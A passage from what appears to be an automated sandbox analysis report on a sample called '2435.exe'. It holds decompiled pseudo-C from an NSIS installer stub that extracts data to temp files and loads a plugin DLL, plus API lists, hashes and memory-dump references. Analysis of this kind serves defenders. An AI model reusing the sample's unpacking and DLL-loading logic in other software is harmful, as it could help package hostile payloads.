					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffee);
					} else {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffe9);
						lstrcatA(0x409b70,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b70);
					E00405427();
					goto L29;
				}
				goto L33;
			}

0x00401734
0x0040173b
0x00401744
0x00401747
0x0040174a
0x0040174f
0x00401757
0x00401773
0x00401759
0x00401759
0x0040175a
0x0040175a
0x00401779
0x00401783
0x00401783
0x00401787
0x0040178a
0x0040178f
0x00401791
0x00401793
0x00401798
0x00401798
0x004017a3
0x004017a3
0x004017b4
0x004017b6
0x004017b6
0x004017b7
0x004017b7
0x004017ba
0x004017bd
0x004017c0
0x004017c0
0x004017c7
0x004017d6
0x004017db
0x004017de
0x004017e1
0x00000000
0x00000000
0x004017e3
0x004017e6
0x00401840
0x00401845
0x004015a8
0x0040265c
0x0040265c
0x0040288b
0x0040288e
0x0040288e
0x00000000
0x004017e8
0x004017ee
0x004017f9
0x00401806
0x00401811
0x00401827
0x00401827
0x0040182a
0x00000000
0x00401830
0x00401830
0x00401831
0x0040184e
0x00402894
0x00402894
0x00402894
0x00401833
0x00401833
0x00401834
0x00401492
0x0040220e
0x0040220e
0x0040220e
0x00401831
0x0040182a
0x00402896
0x0040289a
0x0040289a
0x0040185e
0x00401863
0x00401871
0x00401876
0x0040187c
0x00401880
0x00401882
0x0040188a
0x00401896
0x00401884
0x00401884
0x00401888
0x00000000
0x00000000
0x00401888
0x0040189f
0x004018a5
0x004018a7
0x00000000
0x004018ad
0x004018ad
0x004018b0
0x004018c8
0x004018b2
0x004018b5
0x004018be
0x004018be
0x004018cd
0x004018d2
0x00402209
0x00000000
0x00402209
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73

Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404F98
Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404FB2
Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404FC0

Strings

C:\Users\user\AppData\Local\Temp\nsq166.tmp, xrefs: 0040177E, 004017ED, 0040180B
C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll, xrefs: 00401801, 0040181D
C:\Users\user\AppData\Local\Temp, xrefs: 00401761
Call, xrefs: 00401750, 00401759, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsq166.tmp$C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll$Call
API String ID: 1941528284-2731744693
Opcode ID: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
Instruction ID: ca24b6133afb507e547736dc5ab02d451b7f1a2d30e0a517c5ad6537af4b780a
Opcode Fuzzy Hash: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
Instruction Fuzzy Hash: 8441C131900515BBCB10BFB5DD46EAF3A79EF01369B24433BF511B11E1D63C9A418AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00402F18, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402F18(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x417044 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403043(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417044 =  *0x417044 + _t57;
						_t32 = E00403043(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417044 =  *0x417044 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413040, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413040, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417044 =  *0x417044 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

0x00402f1d
0x00402f27
0x00402f30
0x00402f34
0x00402f3f
0x00402f3f
0x00402f47
0x00402f49
0x00402f50
0x00402f6c
0x00402f70
0x00403039
0x00403039
0x00000000
0x00402f7f
0x00402f82
0x00402f88
0x00402f8f
0x00402f92
0x00402f9b
0x00403008
0x0040300e
0x00403010
0x00403010
0x00403022
0x00403026
0x00000000
0x00403028
0x00403028
0x0040302b
0x00403031
0x00000000
0x00403031
0x00402f9d
0x00402fa0
0x00403034
0x00403034
0x00402fa6
0x00402fab
0x00402fab
0x00402fb3
0x00402fb5
0x00402fb5
0x00402fc6
0x00402fca
0x00000000
0x00000000
0x00402fde
0x00402fe6
0x00403004
0x0040303b
0x0040303b
0x00402fed
0x00402fed
0x00402ff0
0x00402ff3
0x00402ff6
0x00403000
0x00000000
0x00403002
0x00000000
0x00403002
0x00403000
0x00000000
0x00402fe6
0x00000000
0x00402fab
0x00402fa0
0x00402f9b
0x00402f92
0x00402f70
0x0040303c
0x00403040

APIs

SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402F3F
ReadFile.KERNELBASE(00409130,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130), ref: 00402F6C
ReadFile.KERNELBASE(00413040,00004000,?,00000000,00409130,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FC6
WriteFile.KERNELBASE(00000000,00413040,?,000000FF,00000000,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FDE

Strings

@0A, xrefs: 00402FA6

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Read$PointerWrite
String ID: @0A
API String ID: 2113905535-1363546919
Opcode ID: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
Instruction ID: f0f891dec1baa82fcb152a6e3a42d02399587e043c2e4755ce28507b82245ee9
Opcode Fuzzy Hash: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
Instruction Fuzzy Hash: 3F315731501249EBDB21CF55DD40A9E7FBCEB843A5F20407AFA05A6190D3789F81DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403043, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403043(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x417044; // 0x4508f
				_t37 = _t35 -  *0x40afb0 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BD3(1);
					return 0;
				}
				E004031F1( *0x41f054);
				SetFilePointer( *0x409018,  *0x40afb0, 0, 0); // executed
				 *0x41f050 = _t37;
				 *0x417040 = 0;
				while(1) {
					_t12 =  *0x417048; // 0x3b054
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f054;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031BF(0x413040, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f054 =  *0x41f054 + _t34;
					 *0x40afd0 = 0x413040;
					 *0x40afd4 = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						 *0x417040 =  *0x41f050 -  *0x417044 - _a4 +  *0x40afb0;
						E00402BD3(0);
					}
					 *0x40afd8 = 0x40b040;
					 *0x40afdc = 0x8000; // executed
					_t16 = E00405F82(0x40afb8); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd8; // 0x411387
					_t40 = _t39 - 0x40b040;
					if(_t40 == 0) {
						__eflags =  *0x40afd4; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x417044; // 0x4508f
						if(_t18 -  *0x40afb0 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409018, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409018, 0x40b040, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afb0 =  *0x40afb0 + _t40;
						_t53 =  *0x40afd4; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}

0x00403047
0x00403054
0x00403067
0x0040306c
0x004031ad
0x004031af
0x00000000
0x004031b5
0x00403078
0x0040308b
0x00403091
0x00403097
0x004030a2
0x004030a2
0x004030a7
0x004030ac
0x004030b4
0x004030b6
0x004030b6
0x004030bf
0x004030c6
0x00000000
0x00000000
0x004030cc
0x004030d2
0x004030d8
0x00000000
0x004030de
0x004030e4
0x00403104
0x00403109
0x0040310e
0x00403114
0x0040311a
0x00403124
0x0040312b
0x00000000
0x00000000
0x0040312d
0x00403133
0x00403135
0x00403169
0x0040316f
0x00000000
0x00000000
0x00403171
0x00403173
0x00000000
0x00000000
0x00403175
0x00403175
0x00403188
0x00000000
0x00000000
0x00403197
0x00000000
0x00403197
0x00403145
0x0040314d
0x004031a4
0x004031aa
0x004031aa
0x00000000
0x00403155
0x00403155
0x0040315b
0x00403161
0x00000000
0x00000000
0x00000000
0x00403167
0x004031a8
0x004031a8
0x00000000
0x004031a8
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00403058

Part of subcall function 004031F1: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000), ref: 0040308B
WriteFile.KERNELBASE(0040B040,00411387,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403145
SetFilePointer.KERNELBASE(0004508F,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403197

Strings

@0A, xrefs: 004030B8

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Pointer$CountTickWrite
String ID: @0A
API String ID: 2146148272-1363546919
Opcode ID: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
Instruction ID: c862c83604f3b109b9ae356e59bf9e99270c6d64ee518f880403d0392c1b0dc8
Opcode Fuzzy Hash: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
Instruction Fuzzy Hash: 4B41ABB25042029FD710CF29EE4096A7FBDF748356705423BE501BA2E1CB3C6E099B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423f28 =  *0x423f28 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029F6(0xfffffff0);
				 *(_t34 + 8) = E004029F6(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404F04(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af70, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E0040364F(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f51
0x00401f51
0x00401f56
0x00401f5d
0x00402019
0x00402164
0x00402164
0x0040288b
0x0040288e
0x0040289a
0x0040289a
0x00401f6c
0x00401f76
0x00401f79
0x00401f88
0x00401f8c
0x00401f92
0x00401f96
0x00402012
0x00000000
0x00402012
0x00401f98
0x00401fa2
0x00401fa6
0x00401fea
0x00401fa8
0x00401fab
0x00401fae
0x00401fde
0x00401fb0
0x00401fb3
0x00401fbc
0x00401fbe
0x00401fbe
0x00401fbc
0x00401fae
0x00401ff2
0x00402007
0x00402007
0x00000000
0x00401ff2
0x00401f7c
0x00401f82
0x00401f86
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C

Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404F98
Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404FB2
Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404FC0

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007

Strings

?B, xrefs: 00401FC7

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: ?B
API String ID: 2987980305-117478770
Opcode ID: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
Instruction ID: 83c29b7dad20212888764ed045f323035a642c1bbb84e8da84d377f5f563bf0e
Opcode Fuzzy Hash: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
Instruction Fuzzy Hash: D621EE72D04216EBCF207FA4DE49A6E75B06B44399F204237F511B52E0D77C4D41965E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029F6(0xfffffff0);
				_t10 = E004056ED(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405684(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B66("C:\\Users\\alfons\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d6
0x004015d8
0x004015db
0x004015e3
0x004015f0
0x004015fd
0x004015fd
0x004015f2
0x004015f3
0x004015fb
0x00000000
0x00000000
0x004015fb
0x004015f0
0x00401600
0x00401603
0x00401605
0x00401606
0x004015c8
0x0040160d
0x0040162d
0x00402164
0x0040160f
0x00401611
0x0040161c
0x00401622
0x00401622
0x0040288e
0x0040289a

APIs

Part of subcall function 004056ED: CharNextA.USER32(0040549F,?,004218A8,00000000,00405751,004218A8,004218A8,?,?,7519F560,0040549F,?,"C:\Users\user\Desktop\2435.exe" ,7519F560), ref: 004056FB
Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 00405700
Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 0040570F

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-1943935188
Opcode ID: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
Instruction ID: c38907cd9fbddcdb820990ab727de55d75fa8bca08f123d111df4852c942a759
Opcode Fuzzy Hash: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
Instruction Fuzzy Hash: 7E010431D08141AFDB216F751D4497F27B0AA56369728073FF891B22E2C63C0942962E

Uniqueness

Uniqueness Score: -1.00%

Function 0040586C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040586C(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x00405870
0x00405876
0x00405877
0x00405877
0x00405878
0x0040587f
0x00405889
0x00405896
0x00405899
0x004058a1
0x00000000
0x00000000
0x004058a5
0x00000000
0x00000000
0x004058a7
0x00000000
0x004058a7
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040587F
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405899

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040586C, 0040586F
nsa, xrefs: 00405878
"C:\Users\user\Desktop\2435.exe" , xrefs: 00405873

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\2435.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-440675960
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 7bdb262dbebad2fb51735791196b4a750b565e3ebaa120aaaad2cbe3184e43fd
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: B1F0A73734820876E7105E55DC04B9B7F9DDF91760F14C027FE44DA1C0D6B49954C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 733516DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E733516DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7335405c = _a8;
				 *0x73354060 = _a16;
				 *0x73354064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73354038, E73351556);
				_push(1); // executed
				_t37 = E73351A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E733522AF(_t54);
					}
					E733522F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E733524D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E7335156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E733524D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E733524D8(_t54);
							_t37 = GlobalFree(E73351266(E73351559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E7335249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E733514E2( *0x73354058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E73352CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
